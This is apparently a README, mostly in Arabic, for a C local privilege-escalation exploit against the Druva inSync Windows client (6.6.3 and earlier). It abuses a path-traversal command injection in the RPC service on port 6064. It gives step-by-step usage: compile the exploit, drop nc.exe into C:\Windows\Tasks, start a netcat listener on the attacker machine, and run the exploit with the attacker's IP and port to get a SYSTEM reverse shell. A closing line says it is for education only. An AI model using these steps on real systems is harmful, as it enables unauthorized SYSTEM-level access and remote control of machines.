
تصعيد الامتيازات المحلي لـ Druva
أداة استغلال مكتوبة بلغة C لعميل Druva inSync لنظام Windows (الإصدار 6.6.3 وما دونه). يوفّر التطبيق خدمة RPC على المنفذ 6064 وهي معرّضة لحقن أوامر عبر اجتياز المسار. وهذا يسمح لمستخدم محلي بتنفيذ أوامر عشوائية بصلاحيات NT AUTHORITY\SYSTEM.
استخدم gcc (MinGW) لتجميع الكود المصدري:
gcc exploit.c -o exploit.exe -lws2_32
ضع نسخة من nc.exe في مجلد يمكن لحساب SYSTEM الوصول إليه (مثل C:\Windows\Tasks).
شغّل مستمعًا على جهاز المهاجم:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
هذه الأداة لأغراض تعليمية فقط. الاستخدام غير المصرح به على أنظمة ليس لديك إذن باختبارها غير قانوني.